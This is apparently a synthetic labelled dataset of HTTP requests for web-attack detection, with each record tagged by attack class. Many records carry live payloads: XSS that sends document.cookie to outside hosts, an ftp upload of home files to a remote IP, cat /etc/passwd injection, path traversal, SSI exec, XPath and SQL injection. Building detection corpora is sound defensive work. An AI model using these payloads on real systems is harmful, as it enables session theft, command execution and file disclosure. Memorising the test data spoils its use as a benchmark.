Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: http://www.1Tnen.gov/umObomia/CmMvod/faRHM/3Koond.png
TE: trailers,trailers,deflate;q=0.5
Trailer: Authorization
User-Agent: oM1oxKCO http://www.rtnrlMu.ch
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 587x0700
Via: rsc/4.8 www.Oasndl.css, 3.4 170.84.59.159
Transfer-Encoding: aetp
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39652
Start - Id: 46586
class: XSS
GET /4C9.7C4/Vzwr/nNee1efsr/ennZ/k_tcLqhCvsBUVWt5Z7c/a7_1F-kh8L-PG_1PH/egyt5LEYpZ/foeitnr.js?90osao=+tk3tntes6ne&nslmeEoht=73946&mt9lc=0389251&f3saymtft=wa06TFNeg&tetAti=cwlnte+xznf&erzhdcsirnmssas=ornulled&xOdkh=aoa%29Elogsformni HTTP/1.1
Host: 160.131.231.219
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.5, isiri-3342;q=0.3, hz-gb-2312, macintosh
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 115.82.181.163
Cookie: mfllds8d=usfot5;au9uo0o=B) n;ianng=sa;aDqX_bgsoundIlz=dsn
Cookie2: $Version="4"
Date: Sat, 14 Aug 04 15:21:22 UTC
ETag: W/"i_iTdQu4_UB@-BG"
Expect: 100-continue
From: t0epeeaC@htiute.ch
If-Modified-Since: Sun, 29 Nov 09 09:29:21 GMT
If-Unmodified-Since: Tue, 02 Jan 07 24:19:31 UTC
If-Match: *
If-None-Match: "uGpVkJJJCl2.SlLFX"
If-Range: Thu, 23 Aug 07 17:00:25 UTC
Max-Forwards: 697
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic bG9lajpvZXVyZQ==
Range: -65951,35-456894
Referer: /dwkkg/aen0rhMi.fgf
TE: gzip;q=0.2,gzip;q=0.1,gzip
Trailer: Expect
User-Agent: <link   rel=   "     stylesheet  "     href    =  "     javascript:[document.location.replace    ('http://www.latiin.com/cgi-bin/rataonre.cgi'+document.cookie);]   "   >
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 3.7 www.rte1bbrr.shtml, HTTP/3.5 www.2eic.jpeg
Transfer-Encoding: deflate
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 55.134.78.120
X-Serial-Number: 34246962990912
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46586
Start - Id: 35773
class: XPathInjection
GET /D7uirsnym/oNzatsuTtnxhniygcsir/h3-NMGNQ5PQ/muidcytrydnesejMyO/eaw4sHipetnptnne/iqL0pupr/97niTowMtIHNtyain6A.jpg?30y9-DCphp=9571865&aQaTudawend=iF3FMkYqp&o7dssan=a+g9&isrY=1442400993&lql=3&iapies9heu=rpKIcn&vonoNucoohnee=ow%27++++or++++g%2Ftb5to%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D12%5D+or+%27iTrbH%27++++%3D+%27&dntn=ntezdz HTTP/1.0
Host: 57.7.106.215:80
Connection: keep-alive
Accept: image/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, deflate, identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 176.101.31.44
Cookie: ss2=3;dsnitrqtnyrv=gts;2l9aRldnetiguo=dci;teascee=eadRoAraidinput
Cookie2: $Version="11"
Date: Sat, 14 May 05 13:58:02 UTC
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: ttoH9Am=sbdt;Ilpzdte=rufew
From: Nginnon@eatp.net
If-Modified-Since: Mon, 21 Aug 06 16:47:35 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: "n084PCi1_0wB.v-s"
If-None-Match: "W967H0WlXF6AdvCHLvS2"
If-Range: Thu, 03 Sep 09 24:55:21 CET
Max-Forwards: 92
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: yYlne futh=DegdnL
Range: 9042-41
Referer: /lteNrl/eaEld/rvie3Ile.dll
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/9.5 (compatible; shnluwtsvT; Mac OS X; tgeag; dpnunbcL)
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6100x360
Via: gthae/6.9 www.ht4el1.tiff, 7.1 16.141.132.144
Transfer-Encoding: gzip
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35773
Start - Id: 43368
class: OsCommanding
GET /ScB7echog@TB3_qrL@/rng9aFqzF/aYjhDO2315Po/7aonrhqaimDh/5fcaAlsem/y.4w/1mTp41cotyav7er1Qu.png?atex=n%29libyedIsystemcia&gEeelPouices=eeeHnnu-dzousrhutmw&ae=5425240&vAPreplaceBFVHWn=9849&isgadro3e2to=ls+++-las+++%2Fhome%2F++++%7C&u3edex8esrcr=5&eiKhea12eD2=xOx0HWTTNd&9tsB=gttSn44nteeda&aiso4nSipaa=dXPFYKb-XQne HTTP/1.0
Host: www.3rnOipsre.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, compress;q=0.5, identity;q=0.8, gzip;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 255.185.181.53
Cookie: amon7eFsvuuC=88;boErsvned=sew4ohnasa;oEcpfiosy=5;eEecbHo=aHig9rhnxe
Cookie2: $Version="7"
Date: Tue, 27 Dec 05 02:55:18 GMT
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: grhrm
From: xrca@p4bIo.st
If-Modified-Since: Wed, 29 Mar 06 24:44:23 GMT
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: Tue, 11 Dec 07 17:46:42 GMT
Max-Forwards: 3584
MIME-Version: 2.7
Pragma: hso='0EabWd'
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 9-
Referer: /5alpAoai/zw7qwod/T4zD0rz.jpeg
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 3.4; xs-Er; rv:7.4.3) Gecko/12794412
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: pnrl/2.2, znSce2/6.8
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43368
Start - Id: 47935
class: XSS
GET /nefdm1nszc/ncs/Aegla/Smo/7i/hLEvjdExuBmtUt0ejEeF.swf?thEvln9t8oeqre=%3Cstyle++type+%3D++%22++text%2Fjavascript%22%3E%5Balert+%28%27vRehsxns%27%29%3B%5D%3C%2Fstyle+%3E&wa=Tsock_streamNe&ontoscfgd=656952 HTTP/1.0
Host: 166.163.180.116
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Wed, 26 Dec 07 09:27:44 UTC
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Mon, 04 May 09 08:44:10 UTC
If-Unmodified-Since: Fri, 14 Oct 05 17:50:58 GMT
If-Match: *
If-None-Match: *
If-Range: "dui5KMZulNUq4Bq8v7vG"
Max-Forwards: 5120
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: Basic ZGEydGZ1ODpydWxnYXV5
Range: 82-,097137-575
Referer: http://www.oqd0ov.st/regpernl/boeoia/bssn.shtml
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/7.0 (Windows; U; Win98 8.8; 6c-ae; rv:6.6.2) Gecko/10217980
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x206
Via: 7.4 178.195.198.169, 5.0 www.actgeo.jpg, HTTP/5.4 202.57.183.249
Transfer-Encoding: deflate
Upgrade: neecxm/9.5, shwxDs/3.6, peeio/9.1, ehZeh/0.2
Warning: 074 www.lhduar.css "seste7nmh6" "Tue, 21 Sep 04 11:27:26 UTC"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47935
Start - Id: 46184
class: PathTransversal
GET /t@3FHIIrk9kIBQMXA/nr/Tknnnbql/sNimp._h68C/yoar8o.css?yklatumamis51=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&eHbNHUGXZQa-=5439891&rs=5yeerhIegAO HTTP/1.0
Host: www.osoiDY.biz:08
Connection: close
Accept: application/*, text/xml;q=0.5, text/*;q=0.3
Accept-Charset: koi8;q=0.7, windows-1253
Accept-Encoding: identity;q=0.7, compress, identity
Accept-Language: r-e, rlckjhdf-bonltifs;q=0.9, e-nnv;q=0.5
Cache-Control: no-store
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Sun, 16 Sep 07 15:12:07 CET
ETag: W/"3X8b88a8UJS_tx_cxgs"
Expect: 100-continue
From: duvqw@ecyw.st
If-Modified-Since: Tue, 02 Mar 04 17:16:24 GMT
If-Unmodified-Since: Thu, 28 Oct 04 02:25:45 UTC
If-Match: "gBdVIw-rg8PGms5in1U"
If-None-Match: *
If-Range: Sat, 21 Feb 09 23:06:31 UTC
Max-Forwards: 1313
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: /ertssp/saBoeo/g83aip.mpg
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: ptdhGettar7o8nahdN
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46184
Start - Id: 49101
class: XPathInjection
GET /datlaEn/N9k.T2aTz09AiJ/sooe9Tsoeif99rt0tie/t7n0Wd5haYdv/rwVPquoughi/.5L/aawelahrtxte/3MkM7Wstdinftuhq9b/o.8XYQPzb8yIhhNvyfu/2zD9qNH/hE_e/nFN.-Qjl9zvb7ZGT.php?tneT3btstrty=bn6%27+++++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i++%2B++++j++++%2B++k+++%2B+++l+%2B1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++%27oolbatji%27++++%3D%27+++++atnatiin%27+++or&cn=%5CTn&seudj=taie7te&te=96d%3B&body7HuFvJ3=ygr%24 HTTP/1.1
Host: 121.181.135.45
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 139.222.82.202
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="212"
Date: Sun, 22 Oct 06 05:05:03 UTC
ETag: W/"9c1zWwtNPtQbZAAbA6q"
Expect: aZnyhTei
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sun, 05 Jun 05 14:00:58 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: "uyfznM1XcRBNtR-"
If-Range: "81zY1HGZax12lfNso"
Max-Forwards: 323
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: Basic YWxsaXM6aHNpczF3
Range: 80-
Referer: http://aernnpa6.st/uctt3s/Spuia/oSenwx/eafnso.js
TE: deflate;q=0.4,trailers
Trailer: Referer
User-Agent: Mozilla/0.4 (X11; U; SunOS sun4u 2.2; eE-6l; rv:7.3.7) Gecko/91863313
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: deflate
Upgrade: aau/4.8
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49101
Start - Id: 35838
class: XPathInjection
GET /iuhnbeneTqml7r7sr/toExXExawu/YpositioninsertW2Rd17@Z7/0rinsjanehas2htjyo/Nsp1KMAVsP@@r/copyZo@eT/fsneDtdnthsmnhasayn/8qX8zcpPSo57Eb4tZQ-Y/f3yDcVtQTlh15lB7Fu/u1BlInW7.htm?thamlh4daioYtli=ao0F4odiv8paif4&gGq5mailYYCW=16860&emoHIsefsieAi=Mumdam&n2=OaiugHcs%27+++or++++n%2FwoTnnn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D06%5D+++or+%27ti33%27++%3D+%27&I7zeHxoeern=ogduT%3DC%29Si&7hzsedclamnet=eSuDCVO0WZ&execZJ4icAnZxdU=91&eiturwrn=nyNy&IetepdSe=typ&1unt=808263&7ioaa=ieix&9itc8eoftcs=234852419 HTTP/1.1
Host: www.a0Nao.gov
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Mon, 15 May 06 23:50:14 GMT
ETag: "aq3Kr@.usbQW67kgtl"
Expect: 100-continue
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Sun, 28 Jun 09 05:04:54 UTC
If-Unmodified-Since: Tue, 29 Apr 08 09:14:54 UTC
If-Match: *
If-None-Match: "RpNIqkI9L_fw.d4uOhBh"
If-Range: *
Max-Forwards: 72
MIME-Version: 8.2
Pragma: rmssbh=8ile0
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: NTLM Y3cwcHVlN3N4eWN2dnJubm5kajN0ZWVpdXNiNWloa2FuTDN5SXJ0aHlHaW9QZlA=
Range: 77-,-9
Referer: http://hinuuS.ch/ShiLd/rc2bm/ehod1rAi/g5vsgn/qnii8tbr.aspx
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 7.5; hE-ra; rv:1.4.1) Gecko/85884142
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: th9os/5.5 150.159.225.250, HTTP/9.9 www.aleoNiT.htm:91
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35838
Start - Id: 47234
class: XSS
GET /bmebvcegtjrtlmtcb/ngoasiiatbmBaar/dX1Hwinnt/hacenwer/e0Q.jpeg?iavapes69=60542876&1hoAtl5unene=i2rogrk&if5j8ettuapn=aX1go%40&tgaes2Nsnzhchr=388&nanXe3=zt3vs0+dictbtec&ExhAi=oj2&SHz-Ke=NhddhDsheysv3oe&vhoreishoon=%3Cinput+type+%3D++%22++image%22++dynsrc+++%3D+%22+++++javascript%3A++%5Balert++++%28%27hy%27%29%3B%5D+++++%22++%3E HTTP/1.1
Host: www.rMeie.biz:1
Connection: uatn
Accept: */*
Accept-Charset: x-mac-turkish, windows-1254, x-mac-chinesetrad;q=0.6, iso-8859-15, iso-8859-7
Accept-Encoding: identity;q=0.7
Accept-Language: ntrdtcen-ei
Cache-Control: no-transform
Client-ip: 226.163.167.76
Cookie: dobdiuhuham=11eacxxp4;eA5io=oUypbGUQqJ5;ipnTag3s0=sjcY;WNdtZ=r_awIqSuH8-;1jaopLsvWsEsG=%ha1ibgsound:6t$S;0zm0=ee5 ]&/t?EwA$ ty0
Cookie2: $Version="633"
Date: Tue, 29 Mar 05 09:52:03 CET
ETag: "uBrX2tCovUdEGKdgZkT"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Thu, 30 Sep 04 16:12:16 GMT
If-Unmodified-Since: Mon, 11 Feb 08 02:53:23 GMT
If-Match: "LtcuKYm7fV9WbEX7Rj"
If-None-Match: *
If-Range: Fri, 14 Dec 07 14:29:50 GMT
Max-Forwards: 0
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: NTLM bmFpdGFUcGwzYWJveXROZHVUY3RuYXAyd255Z3pBc29p
Range: 642-53334
Referer: /sttiaoe.swf
TE: trailers,gzip;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: jarwryOaee85
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: 1.8 138.131.61.55, 3.2 168.36.51.249
Transfer-Encoding: deflate
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47234
Start - Id: 36719
class: OsCommanding
GET /viuet6rpNo8Oe/smn/epL36FVljnhxDoYvg/calrArowis/ty7i4esyib1av1@@qO/mkYt.nCKPdK/u3Y0/Kotyaatm8o.exe?lnd=22376&ttinsioeildbd=%27+++++%3Buftp+-g++%2Fhome%2Fstmali%2Finstar++132.168.44.80+++%2Fneve+%3B&aen7rsxbTowhiu=cZdzOhNr96&NBAY@netcatmn8G=egm%406i%267tima&dropUWRYIPMge=eXQw1m0q&iSr4arto=41817&Riqet6zaoy=587282172 HTTP/1.1
Host: 29.138.249.225
Connection: Ssih
Accept: text/html, application/x-tar;q=0.7
Accept-Charset: windows-1252, iso-8859-8-i;q=0.7, x-mac-arabic, koi8;q=0.3
Accept-Encoding: identity, deflate;q=0.9, gzip;q=0.9, deflate;q=0.0, identity;q=0.8
Accept-Language: o375-edSu5ns;q=0.9, om8na-imeluNot;q=0.3, mhernetp-tms
Cache-Control: max-stale
Client-ip: 234.49.182.184
Cookie: -node1HcmdhpassthruA=133548103
Cookie2: $Version="79"
Date: Tue, 10 Aug 04 08:56:13 GMT
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: bRj6lAi
From: tiesic@4ercsals.org
If-Modified-Since: Wed, 14 Feb 07 01:05:49 UTC
If-Unmodified-Since: Tue, 20 Sep 05 18:09:21 CET
If-Match: "Fg9C7_vul6nIvRq"
If-None-Match: *
If-Range: *
Max-Forwards: 030
MIME-Version: 6.4
Pragma: no-cache
Authorization: Digest uri=/r38t/bngs5.css
Range: 36-238879
Referer: /oe2Oode.jpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.6 (compatible; MSIE 3.8; Open BSD i386; areemusig)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/5.0 196.208.230.20
Transfer-Encoding: nrsTa; atnhdtfa=moo1ilo
X-Forwarded-For: 18.24.168.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36719
Start - Id: 43632
class: OsCommanding
POST /741KmmnDE/o5MQ/sbfLi77lm/hR6MVKrhfMzN21/miu./iaEseb8rtetpt1niT/Cjscript6ZihEo.html? HTTP/1.0
Content-Length: 308
Content-Language: Psccbm
Content-Encoding: gzip
Content-Location: /7sHwgv/aW9r/lehgt/tkdxreog.htm
Content-MD5: aW9kV3pzbnVodHFnZUVldg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Mar 09 22:41:25 CET
Last-Modified: Fri, 06 Feb 04 07:16:56 CET
Host: 190.212.137.201
Connection: n2yrvalt
Accept: */*;q=0.6
Accept-Charset: windows-1254, cp-950;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 74.56.238.145
Cookie: LVXAWpsCnp=9339064086;ttvi3rmLsntNRt= nph-lset;7onoyCH=fo1h;lP2eEesoeat5=%0a    cat%0a  /etc/passwd    %0a
Cookie2: $Version="7"
Date: Tue, 01 Nov 05 10:55:36 CET
ETag: W/"BoI.y1OBAJbXOx8"
Expect: 100-continue
If-Modified-Since: Wed, 22 Oct 08 02:41:06 GMT
If-Unmodified-Since: Fri, 15 Dec 06 20:09:34 CET
If-Match: "06eIWVKwTWwydY6R3qR"
If-None-Match: *
If-Range: "Eu3lrygeHtIb8_1es-"
Max-Forwards: 53
Pragma: 0ahaa='il'
Proxy-Authorization: vmtm8 ie6h=oe8d
Authorization: ndup ft4i=nEgC
Referer: /eoma/roaep/BAot.css
User-Agent: 2a@IwVK6tU http://www.aeAnee.org
UA-Disp: 9318,8305,16
Via: HTTP/2.6 246.247.83.104, 6.2 245.74.141.113, 9.0 www.ssaafs.html
X-Serial-Number: 3183555985904482173
----: -------------------

matDhietxet0V=159&hIh=eexecilE$Er o&eiixryiqnt=rrdrope|Tpp&8taleafnn=crorunirtgNaaDoSat&0yoi7o=s8oto1tne&d0dDF8g=5848&htakcEr=46&mE7ezdWitbaed=sbbinnsjaeM0w182&tDcm8copyqIrshutdown=sMIwrJ6STSo&disq8redepHecds=laexni erh&hinaEccpUri=3855924&5eojpstrorweQ5=37659505&eto=i5hos6nohdanye&tHoZUxphpv=oSe&tefs

End - Id: 43632
Start - Id: 39138
class: SSI
GET /nautl7obeesjhHet5/eart7ey4sHa/neyoi7mt4siso.sh?73eaeshad=p&nri=bin6lrcnogto&unb=style8n&aanrQObyt=6655&tooDRi50i=cp0&a8mzegac=ercpd0foeytiih%27hL&hddivtle9n=01&hxy=kpieadiifdeexao%3Fat&9mrIsptmDaysmh=rE0aqlk&Nwhhxvih=l2olmosos6hwia&dinz6hbiOepoer=uSOlcZBBFl&ttent1t=3503&3tm9lr=ikqx&7tc1nsrqop=zSN_wGWNOa2 HTTP/1.1
Host: www.xnoirf.fr
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=617
Client-ip: 120.150.59.49
Cookie: halspltdgPwuy=gfltiitOz6;adhthbolamjaO=7;9usLtd=0bWC9H
Cookie2: $Version="503"
Date: Mon, 08 Mar 10 22:55:16 GMT
From: dwtnbtl@re8os1r5d.org
If-Modified-Since: Mon, 26 Jan 04 10:23:27 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 2
Authorization: 4srCbj 2fS0Y=3dxIys
Range: 85-9,-11
Referer: /c2iNa/tSrhiet/aidXhmsd.asp
User-Agent: <!--     #exec   cgi="/cgi-bin/script?Ejraiedeb"   -->
UA-Color: color16
Via: HTTP/9.5 176.161.237.47, HTTP/7.4 www.Lnnaue0.png, 8.7 www.9tno3r.jpeg

null

End - Id: 39138
Start - Id: 48205
class: XSS
PUT /u8xhYSXdfRS8zT3OMB8/u5e1tnlR/igM86_f09lwPq/naemae/9lz/fz6s-C/lVEHrvgijO/2ERjgDf8udbF4j4@nw.shtml? HTTP/1.1
Content-Length: 126
Content-Language: caSm,y0
Content-Encoding: gzip
Content-Location: http://org66.uk/aao7mat/binj.conf
Content-MD5: cnRjcnVBc2xlT2FpZGxlNg==
Content-Type: application/x-www-form-urlencoded
Host: 132.66.252.173:077
Connection: auyuh
Accept-Charset: x-mac-icelandic, utf-8;q=0.8, iso-8859-2, x-mac-greek
Accept-Encoding: 
Accept-Language: 8dhn-meoioeo, le-ebo;q=0.4, di-nr, vsd4k-dese;q=0.9
Cache-Control: only-if-cached
If-Match: "uJpmGiUU.4I_S08dxeT"
Referer: http://www.snIlht2a.biz/pryN/EsyeieAr/tT9seg/r2t2il.jsp
TE: deflate,gzip,trailers
User-Agent: <bgsound   src="   javascript:[window.open('http://125.42.33.108/ar.jsp'+document.cookie);]"   >
UA-Pixels: 9299x1664
Via: 7.7 www.ta6oAirn.gif, 0.4 www.sehkdsh.tiff

itlnn4=inVT(dttneieb%]2tst&tnnteaieum0=40&ngomac9ps=2n$mezrV&nmtgxEvtrUe2o1s=c~sjimsyek &1LKt=osC.4&0RI=hgroup bytwo

End - Id: 48205
Start - Id: 47588
class: XSS
GET /qsT4Ecja/_o@IFWPqLXhttps.jpg?t2eo=icN%7Cand%27io8bt&chre=%3Ciframe+++++src+++%3D++++%22+++vbscript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.alin.com%2Fcgi-bin%2Ftrnite.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&innveo=iSl1Z-B.qhS&re=meymtkgfnhe&tadElati=m&zS4xDQ2mGVu=pw1_ljHPBg&iss=728958&aKeieln=otNrpbcEs&ai=etlhropc4t9&53Dein=%3Dl%3Brcp%3Dav HTTP/1.0
Host: www.hrsE1iSeo.com:80
Connection: slus
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.98.57.72
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Sat, 16 Jul 05 02:12:06 GMT
ETag: "bZLg6tJkGOeIzov_"
Expect: 100-continue
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 16 May 08 18:43:03 CET
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: "NdR7AF0p89vmqDIw"
If-Range: Sun, 18 May 08 22:22:08 CET
Max-Forwards: 8679
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: Basic dzJob2FjOmVpcmdFbnI=
Range: 849916-
Referer: /sh4a.php3
TE: chunked,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (Windows; U; Win98 4.2; nd-rb; rv:8.6.6) Gecko/37203307
UA-CPU: StrongARM
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: FTP/4.6 www.estph.gif, FTP/6.4 118.117.127.105:063
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47588
Start - Id: 35197
class: SqlInjection
GET /ihdi1sg6/91copyFdhtaccesD9pI/dKSchild5K.KGTs/aAs26/auRe/oMip75Y9M/yKko/oy5/neWtW9HAF9K/aVgEt9pwkRz.css?oonsg=1atia%3A+8wheree%2BrEhon&ccewu=81957&execevalFH@=%27++++%2F**%2F++++OR+++++%2F**%2F+%27ecoo%27++%3E+++%27S HTTP/1.1
Host: 113.144.15.122
Connection: nrrtmi
Accept: image/*;q=0.7
Accept-Charset: *;q=0.1
